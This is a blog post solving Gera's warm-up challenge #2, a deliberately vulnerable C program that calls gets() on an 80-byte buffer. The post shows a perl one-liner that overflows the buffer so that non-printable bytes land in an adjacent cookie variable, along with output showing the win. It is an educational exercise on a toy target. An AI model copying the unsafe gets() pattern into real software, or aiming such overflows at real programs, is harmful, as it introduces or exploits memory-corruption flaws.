#include <stdio.h>
int main() {
int cookie;
char buf[80];
printf("buf: %08x cookie: %08x\n", &buf, &cookie);
gets(buf);
if (cookie == 0x01020305)
printf("you win!\n");
}
Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.
There are a few ways to deal with this:- Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
- Use inline perl.
perl -e 'print "q" x 80 . "\x05\x03\x02\x01"' - Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!
No comments:
Post a Comment
Have something you want to say? You think I'm wrong? Found something I said useful?
Leave a comment!